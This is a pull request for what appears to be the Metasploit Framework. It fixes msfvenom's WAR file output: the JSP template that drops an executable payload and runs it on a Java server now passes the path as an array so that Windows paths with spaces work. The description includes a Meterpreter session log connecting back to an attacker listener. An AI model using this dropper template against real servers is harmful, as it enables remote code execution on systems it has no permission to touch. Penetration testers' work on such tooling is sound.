### PR TITLE
Fixes .war file creation

### DIFF
--- a/data/templates/scripts/to_exe_jsp.war.template
+++ b/data/templates/scripts/to_exe_jsp.war.template
@@ -39,13 +39,13 @@
 		if (%{var_proc}.waitFor() == 0) {
 			%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
 		}
-		
+
 		File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
-	} 
-	else 
+	}
+	else
 	{
-	    String[] %{var_exepatharray} = new String[1];
-	    %{var_exepatharray}[0] = %{var_exepath};
+		String[] %{var_exepatharray} = new String[1];
+		%{var_exepatharray}[0] = %{var_exepath};
 		Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
 	}
 %%>

--- a/data/templates/scripts/to_exe_jsp.war.template
+++ b/data/templates/scripts/to_exe_jsp.war.template
@@ -44,6 +44,8 @@
 	} 
 	else 
 	{
-		Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+	    String[] %{var_exepatharray} = new String[1];
+	    %{var_exepatharray}[0] = %{var_exepath};
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
 	}
 %%>

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1040,6 +1040,7 @@ def self.to_vba(framework,code,opts={})
     hash_sub[:var_proc]          = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_fperm]         = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_fdel]          = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_exepatharray]  = Rex::Text.rand_text_alpha(rand(8)+8)
 
     # Specify the payload in hex as an extra file..
     payload_hex = exe.unpack('H*')[0]

--- a/msfvenom
+++ b/msfvenom
@@ -461,8 +461,6 @@ class MsfVenom
       exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
       if (!exe && payload.respond_to?(:generate_war))
         exe = payload.generate_war.pack
-      else
-        exe = ::Msf::Util::EXE.to_jsp_war(exe)
       end
       @out.write exe
 


### PR DESCRIPTION
Msfvenom was creating invalid executables for War file creation.
The jsp template file used Runtime.getRuntime(&lt;String&gt;) which causes the execution to fail in windows where the path includes a space character. This is due to security updates in Java 7u21 (thanks @schierlm)

[FixRM #8717]
[FixRM #8724]

```
[*] Meterpreter session 2 opened (192.168.1.22:4444 -> 192.168.1.117:63345) at 2013-12-22 21:05:16 +0000

meterpreter > pwd
C:\Users\Ben\Desktop\New folder\apache-tomcat-8.0.0-RC5\bin
```
